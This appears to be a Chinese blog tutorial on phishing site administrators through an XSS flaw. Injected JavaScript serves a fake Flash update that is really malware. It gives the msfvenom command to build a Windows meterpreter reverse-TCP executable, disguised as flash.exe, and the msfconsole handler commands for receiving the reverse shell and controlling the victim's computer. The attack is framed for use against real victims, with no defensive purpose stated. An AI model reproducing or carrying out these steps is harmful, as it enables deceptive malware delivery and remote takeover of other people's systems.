XSS-flash攻击钓鱼

1.复制xssaq.com中的公共模块中的flash钓鱼的js代码

2.在www下新建一个js文件,把代码复制进去

3.寻找受害者,目标为后台的管理员,找一个xss漏洞让管理员的页面引用外部的我们的js文件

4.管理员后台页面执行了我们发过去的引用外部文件的script代码

5.当管理员点击立即升级的时候,会让管理员下载一个可执行程序,控制下载文件的代码在1.js中,为了更容易让管理员相信,将文件命名为flash.exe,管理员再次点击立即升级时,下载的文件就成了我们的flash.exe。

上面的flash.exe是我们要让管理员下载运行的病毒文件,当管理员下载运行后我们就能控制管理员电脑了

如何制作病毒及伪装病毒

1.打开kali制作病毒

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.126.130 LPORT=4444 -f exe > shell.exe

未找到命令的话执行下列命令 

apt-get update
sudo apt-get install metasploit-framework

再次运行

2.把shell.exe拖到我们的假网站上并改成flash安装包的名字

3.这个病毒已经能够正常使用了,我们先在kali中当做攻击者对自己的病毒进行监听,看看受害者有没有点击病毒,如果点击的话,我们会接收到这个监听

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.126.130
set lport 4444
run

4.受害者管理员点击立即升级下载该程序并执行,kali中收到监听并能够控制受害者电脑

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值